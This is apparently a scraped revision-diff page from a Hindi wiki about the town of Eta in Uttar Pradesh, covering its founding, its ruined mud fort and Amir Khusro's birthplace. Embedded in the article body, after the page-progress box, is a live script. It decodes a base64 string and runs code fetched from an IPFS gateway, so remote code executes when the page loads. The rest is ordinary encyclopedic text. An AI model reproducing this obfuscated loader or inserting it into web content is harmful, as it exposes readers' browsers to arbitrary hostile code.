Difference between revisions of "एटा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
 
(7 intermediate revisions by 6 users not shown)
Line 1: Line 1:
*[[ब्रजभाषा]] के महान कवि और संगीतकार [[अमीर ख़ुसरो]] दहलवी का जन्म [[उत्तर प्रदेश]] के एटा ज़िले के पटियाली नामक ग्राम में [[गंगा नदी|गंगा]] किनारे हुआ था।  
+
'''एटा''' [[भारत]] के [[उत्तर प्रदेश]] प्रान्त का एक शहर है। एटा ज़िला मुख्यालय है।
*एटा भारत के उत्तर प्रदेश प्रान्त का एक शहर है |
+
*[[ब्रजभाषा]] के महान् कवि और संगीतकार [[अमीर ख़ुसरो|अमीर ख़ुसरो दहलवी]] का जन्म [[उत्तर प्रदेश]] के [[एटा ज़िला|एटा ज़िले]] के पटियाली नामक [[ग्राम]] में [[गंगा नदी|गंगा]] किनारे हुआ था।
*एटा ज़िला मुख्यालय है।
+
*इसे [[पृथ्वीराज चौहान]] के सरदार राजा संग्राम सिंह ने बसाया था। इसने एटा में एक सुदृढ़ मिट्टी का [[दुर्ग]] बनवाया था जिसके खंडहर आज भी मौजूद हैं।
*इसे [[पृथ्वीराज चौहान]] के सरदार राजा संग्राम सिंह ने बसाया था। इसने एटा में एक सुदृढ़ मिट्टी का दुर्ग बनवाया था जिसके खंडहर आज भी मौजूद हैं।
+
 
 +
 
 +
 
 +
 
 +
 
 +
 
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 +
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 110| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 +
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{उत्तर प्रदेश के नगर}}
 
{{ब्रज}}
 
{{ब्रज}}
 
{{ब्रज के दर्शनीय स्थल}}
 
{{ब्रज के दर्शनीय स्थल}}
Line 9: Line 19:
 
[[Category:उत्तर प्रदेश]]
 
[[Category:उत्तर प्रदेश]]
 
[[Category:उत्तर प्रदेश के नगर]]
 
[[Category:उत्तर प्रदेश के नगर]]
[[Category:भारत के नगर]]
+
[[Category:भारत के नगर]] [[Category:ऐतिहासिक स्थानावली]]
 
[[Category:ब्रज]]
 
[[Category:ब्रज]]
 
 
 
 
 
 
__INDEX__
 
__INDEX__

Latest revision as of 11:32, 18 May 2018

eta bharat ke uttar pradesh prant ka ek shahar hai. eta zila mukhyalay hai.




panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 110| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar

sanbandhit lekh